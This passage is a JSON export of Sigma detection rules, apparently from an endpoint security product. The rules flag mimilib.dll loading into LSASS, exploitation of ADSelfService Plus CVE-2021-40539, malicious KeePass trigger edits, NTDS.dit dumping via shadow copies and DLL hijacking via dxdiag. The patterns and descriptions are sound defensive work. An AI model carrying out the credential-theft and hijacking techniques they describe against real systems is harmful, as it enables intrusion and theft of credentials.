"rule_description": "Detects the loading of mimilib.dll into the Local Security Authority Subsystem Service (LSASS) process.\nThis DLL is specifically designed to hook into LSASS memory to extract credentials, hashes, and Kerberos tickets. This technique requires administrative privileges and is commonly used in post-exploitation phases of an attack.\nIt is recommended to investigate the source process that triggered the DLL load, the user context, and any subsequent network connections or file system activity that could indicate credential exfiltration.\n",
"rule_creation_date": "2021-03-03",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078",
"attack.t1550.002",
"attack.t1550.003",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89cb912c-bc9a-49a3-ba8e-0c446e538259",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598638Z",
"creation_date": "2026-03-23T11:45:34.598641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598649Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539",
"https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html",
"https://www.cisa.gov/uscert/ncas/alerts/aa21-259a"
],
"name": "cve_2021_40539_adselfservice_plus.yml",
"content": "title: ADSelfService Plus CVE-2021-40539 Vulnerability Exploited\nid: 89cb912c-bc9a-49a3-ba8e-0c446e538259\ndescription: |\n Detects a successful attempt at exploiting CVE-2021-40539 on ADSelfService Plus.\n ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n It is recommended to analyze processes executed by Java to determine their legitimacy as well as to look for other suspicious actions on the host.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539\n - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\n - https://www.cisa.gov/uscert/ncas/alerts/aa21-259a\ndate: 2022/02/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.privilege_escalation\n - attack.t1574\n - cve.2021-40539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.ADSelfService\n - classification.Windows.Exploit.CVE-2021-40539\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\java.exe'\n ParentCommandLine|contains: 'ManageEngineADSFramework'\n Image|endswith: '\\keytool.exe'\n # Hardcoded in ADSelfService Plus vulnerable codepath.\n CommandLine|contains: 'keytool.exe -J-Duser.language=en -genkey -alias tomcat -sigalg SHA256withRSA -keyalg RSA -keypass '\n\n selection_variant_keysize:\n CommandLine|contains:\n - '-providerpath'\n - '-providerclass'\n\n condition: selection and 1 of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89cb912c-bc9a-49a3-ba8e-0c446e538259",
"rule_name": "ADSelfService Plus CVE-2021-40539 Vulnerability Exploited",
"rule_description": "Detects a successful attempt at exploiting CVE-2021-40539 on ADSelfService Plus.\nADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\nIt is recommended to analyze processes executed by Java to determine their legitimacy as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2022-02-23",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89d049a9-66b6-4aeb-a134-d85e0e408ace",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621070Z",
"creation_date": "2026-03-23T11:45:34.621072Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621077Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/alt3kx/CVE-2023-24055_PoC",
"https://keepass.info/help/kb/trigger_examples.html"
],
"name": "t1555_005_suspicious_keepass_configuration_modification.yml",
"content": "title: Suspicious KeePass Configuration File Modification\nid: 89d049a9-66b6-4aeb-a134-d85e0e408ace\ndescription: |\n Detects a suspicious modification of the KeePass configuration file.\n KeePass allows to configure triggers to automatically launch actions based on different events.\n Attackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate credentials to an attacker-controlled server.\n The CVE 2023-24055 is known to exploit this feature.\n It is recommended to investigate the other actions taken by the binary which made the modification, as well as potential suspicious authentications following this action.\nreferences:\n - https://github.com/alt3kx/CVE-2023-24055_PoC\n - https://keepass.info/help/kb/trigger_examples.html\ndate: 2023/03/08\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - attack.credential_access\n - attack.t1555.005\n - attack.collection\n - attack.t1119\n - attack.exfiltration\n - attack.t1020.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.CVE-2023-24055\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_write\ndetection:\n selection:\n Path|endswith: '\\KeePass.config.xml'\n ProcessParentImage|contains: '?'\n\n filter_keepass:\n - ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, Dominik Reichl'\n - ProcessImage:\n - '?:\\Program Files\\KeePass Password Safe 2\\KeePass.exe'\n - '?:\\Program Files (x86)\\KeePass Password Safe 2\\KeePass.exe'\n\n filter_keepass_msix_unsigned:\n ProcessCompany: 'Dominik Reichl'\n ProcessProduct: 'KeePass Password Safe'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sysytem:\n ProcessName: 'system'\n ProcessId: '4'\n\n # https://pleasantpasswords.com/\n exclusion_pleasant:\n ProcessOriginalFileName: 'KeePass.exe'\n ProcessCompany: 'Pleasant Solutions'\n\n exclusion_wapt:\n ProcessImage:\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpythonw.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files (x86)\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_install:\n ProcessImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessCommandLine|contains|all:\n - ' -ExecutionPolicy ByPass'\n - ' -File '\n - 'Install'\n ProcessParentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_deploytoolkit:\n ProcessParentImage:\n - '?:\\Windows\\ccmcache\\\\*\\Deploy-Application.exe'\n - '?:\\Windows\\IMECache\\\\*\\Deploy-Application.exe'\n\n exclusion_explorer:\n - ProcessImage: '?:\\Windows\\explorer.exe'\n ProcessParentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n - ProcessImage: '?:\\Windows\\explorer.exe'\n ProcessCommandLine|contains: '/factory,{'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_beyondcompare:\n ProcessImage: '?:\\Program 
Files\\Beyond Compare 4\\BCompare.exe'\n ProcessSignature: 'Scooter Software Inc'\n\n exclusion_symantec:\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_backup:\n ProcessImage:\n - '?:\\Windows\\System32\\VSSVC.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Windows\\System32\\xcopy.exe'\n\n exclusion_intune:\n ProcessParentImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n\n exclusion_transwiz:\n ProcessImage:\n - '?:\\ProgramData\\ForensiT\\Transwiz\\Deployment Files\\Transwiz.exe'\n - '?:\\Transwiz\\Transwiz.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89d049a9-66b6-4aeb-a134-d85e0e408ace",
"rule_name": "Suspicious KeePass Configuration File Modification",
"rule_description": "Detects a suspicious modification of the KeePass configuration file.\nKeePass allows to configure triggers to automatically launch actions based on different events.\nAttackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate credentials to an attacker-controlled server.\nThe CVE 2023-24055 is known to exploit this feature.\nIt is recommended to investigate the other actions taken by the binary which made the modification, as well as potential suspicious authentications following this action.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.exfiltration",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1020.001",
"attack.t1119",
"attack.t1546",
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a001854-f3b2-4a21-81af-df74ddf642d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624436Z",
"creation_date": "2026-03-23T11:45:34.624438Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624442Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/003/"
],
"name": "t1003_003_ntds_file_access_shadowcopy.yml",
"content": "title: NTDS Database Dumped from Volume Shadow Copy\nid: 8a001854-f3b2-4a21-81af-df74ddf642d2\ndescription: |\n Detects accesses to the NTDS.dit file inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to dump the Active Directory Database for credential access.\n It is recommended to investigate the process trying to access the NTDS database for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\ndate: 2023/06/26\nmodified: 2025/12/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n Path|endswith: '\\Windows\\NTDS\\ntds.dit'\n\n selection_remote_system:\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr: 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_dell:\n ProcessImage:\n - '?:\\Program Files\\Dell\\SARemediation\\agent\\DellSupportAssistRemedationService.exe'\n - '?:\\Program Files (x86)\\Dell\\SARemediation\\agent\\DellSupportAssistRemedationService.exe'\n - '?:\\Program Files (x86)\\Dell Backup and Recovery\\SftService.exe'\n\n exclusion_eset:\n ProcessImage: '*\\ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. 
s r.o.'\n\n exclusion_mcafee:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\McAfee\\SystemCore\\mcshield.exe'\n - '?:\\Program Files (x86)\\Common Files\\McAfee\\SystemCore\\mcshield.exe'\n - '?:\\Program Files\\McAfee\\Agent\\masvc.exe'\n - '?:\\Program Files (x86)\\McAfee\\Agent\\masvc.exe'\n\n exclusion_trend:\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe'\n - '?:\\Program Files\\Trend Micro\\Cloud Endpoint\\CloudEndpointService.exe'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender*\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender*\\platform\\\\*\\MsSense.exe'\n\n exclusion_sophos:\n ProcessImage:\n - '?:\\Program Files\\Sophos\\Endpoint Defense\\SSPService.exe'\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\ALUpdate.exe'\n - '?:\\Program Files (x86)\\Sophos\\Sophos Anti-Virus\\SavService.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_timenavigator:\n ProcessImage:\n - '?:\\Program Files\\Atempo\\TimeNavigator\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files (x86)\\Atempo\\TimeNavigator\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files\\Atempo\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files (x86)\\Atempo\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files\\Atempo\\TimeNavigator\\windows\\Bin\\tina_bck.exe'\n - '?:\\Program Files (x86)\\Atempo\\TimeNavigator\\windows\\Bin\\tina_bck.exe'\n\n #exclusion_clbackup:\n # ProcessImage:\n # - '?:\\Program Files\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n # - '?:\\Program Files (x86)\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n # - '?:\\Program 
Files\\Commvault\\ContentStore2\\Base\\CLBackup.exe'\n # - '?:\\Program Files (x86)\\Commvault\\ContentStore2\\Base\\CLBackup.exe'\n # - '?:\\Program Files\\CommVault\\Simpana\\Base\\CLBackup.exe'\n # - '?:\\Program Files (x86)\\CommVault\\Simpana\\Base\\CLBackup.exe'\n exclusion_clbackup:\n ProcessOriginalFileName: 'clBackup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_lenovo:\n ProcessImage:\n - '?:\\Program Files (x86)\\Lenovo\\Rescue and Recovery\\br_funcs.exe'\n - '?:\\Program Files\\Lenovo\\Rescue and Recovery\\br_funcs.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n ProcessCommandLine|contains|all:\n - 'activate'\n - 'instance'\n\n exclusion_backup_exec:\n ProcessImage:\n - '?:\\Program Files\\SYMANTEC\\BACKUP EXEC\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\beremote.exe'\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n\n exclusion_avamar:\n ProcessImage:\n - '?:\\Program Files\\avs\\bin\\avtar.exe'\n - '?:\\Program Files (x86)\\avs\\bin\\avtar.exe'\n\n exclusion_netbackup:\n ProcessImage: '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n\n exclusion_sentinelone:\n ProcessImage: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelAgent.exe'\n\n exclusion_burp:\n ProcessImage: '?:\\Program Files\\Burp\\bin\\burp.exe'\n\n # C:\\Windows\\system32\\ESENTUTL.EXE /k /tC:\\Program Files\\Veritas\\Backup Exec\\RAWS\\logs \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy79\\Windows\\NTDS\\ntds.dit\n exclusion_esentutl_various:\n ProcessImage: '?:\\Windows\\System32\\esentutl.exe'\n ProcessParentImage:\n - '?:\\Program Files\\SYMANTEC\\BACKUP EXEC\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\beremote.exe'\n - '?:\\Program 
Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n\n exclusion_trusted_installer:\n ProcessImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_datasafe:\n ProcessImage:\n - '?:\\Program Files (x86)\\Data Safe Restore\\plugins\\vss\\vshadow-64.exe'\n - '?:\\Program Files (x86)\\Data Safe Restore\\DSR Client.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_barracuda:\n # C:\\Program Files\\Barracuda\\Barracuda Backup Agent\\win\\x86_64\\BackupService.exe\n # C:\\Program Files\\Barracuda\\Yosemite Server Backup\\win\\x86_64\\ytwinsdr.exe\n ProcessImage:\n - '?:\\Program Files\\Barracuda\\Barracuda Backup Agent\\win\\\\*\\BackupService.exe'\n - '?:\\Program Files\\Barracuda\\Yosemite Server Backup\\win\\\\*\\ytwinsdr.exe'\n\n exclusion_hp:\n ProcessImage: '?:\\Program Files\\HP\\Data Protector Express\\win\\x86_64\\dpwinsdr.exe'\n\n exclusion_runtime_software:\n ProcessImage: '?:\\Program Files (x86)\\Runtime Software\\DriveImage XML\\dixml.exe'\n\n exclusion_bacula:\n ProcessImage: '?:\\Program Files\\Bacula\\bacula-fd.exe'\n\n exclusion_symantec:\n - ProcessImage: '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n - ProcessParentImage: '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n\n exclusion_cyberprotect:\n ProcessImage: '?:\\Program Files\\BackupClient\\CyberProtect\\cyber-protect-service.exe'\n\n exclusion_atempo:\n 
ProcessImage: '?:\\Program Files\\Atempo\\Atempo Lina\\Agent\\bin\\HNAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ATEMPO SAS'\n\n exclusion_duplicati:\n ProcessImage: '?:\\Program Files\\Duplicati 2\\Duplicati.Server.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kenneth Skovhede'\n\n exclusion_arcserve:\n ProcessImage: '?:\\Program Files\\CA\\SharedComponents\\ARCserve Backup\\UniAgent\\caagstart.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Arcserve (USA) LLC'\n - 'CA, Inc.'\n\n exclusion_omniback:\n ProcessImage: '?:\\Program Files\\OmniBack\\bin\\vbda.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Micro Focus Group Limited'\n\n exclusion_semperis_recovery_agent:\n ProcessImage: '?:\\Program Files\\Semperis\\ADFR\\Semperis.ForestRecoveryAgentSvcHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEMPERIS INC.'\n\n exclusion_oxibox:\n ProcessImage: '?:\\Program Files\\Oxibox\\oxibackupd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Oxibox'\n\n exclusion_ibm:\n ProcessImage: '?:\\Program Files\\Tivoli\\TSM\\baclient\\dsmcsvc.exe'\n ProcessSigned: 'true'\n\n exclusion_emc:\n ProcessImage: '?:\\Program Files\\EMC NetWorker\\nsr\\bin\\save.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Dell Technologies Inc.'\n\n exclusion_nable:\n ProcessImage: '?:\\Program Files\\Backup Manager\\BackupFP.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'N-ABLE TECHNOLOGIES LTD'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a001854-f3b2-4a21-81af-df74ddf642d2",
"rule_name": "NTDS Database Dumped from Volume Shadow Copy",
"rule_description": "Detects accesses to the NTDS.dit file inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be indicative of an attempt to dump the Active Directory Database for credential access.\nIt is recommended to investigate the process trying to access the NTDS database for malicious contents.\n",
"rule_creation_date": "2023-06-26",
"rule_modified_date": "2025-12-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a21b7f5-7bb1-4166-a5ae-c791651cf72b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093417Z",
"creation_date": "2026-03-23T11:45:34.093419Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093423Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_dxdiag.yml",
"content": "title: Phantom DLL Hijacking via dxdiag.exe\nid: 8a21b7f5-7bb1-4166-a5ae-c791651cf72b\ndescription: |\n Detects a potential Windows DLL search order hijacking via dxdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\DXGIDebug.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8a21b7f5-7bb1-4166-a5ae-c791651cf72b",
"rule_name": "Phantom DLL Hijacking via dxdiag.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via dxdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a269d59-6392-43f4-bd66-134da5a52148",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093390Z",
"creation_date": "2026-03-23T11:45:34.093392Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093397Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_addressbook.yml",
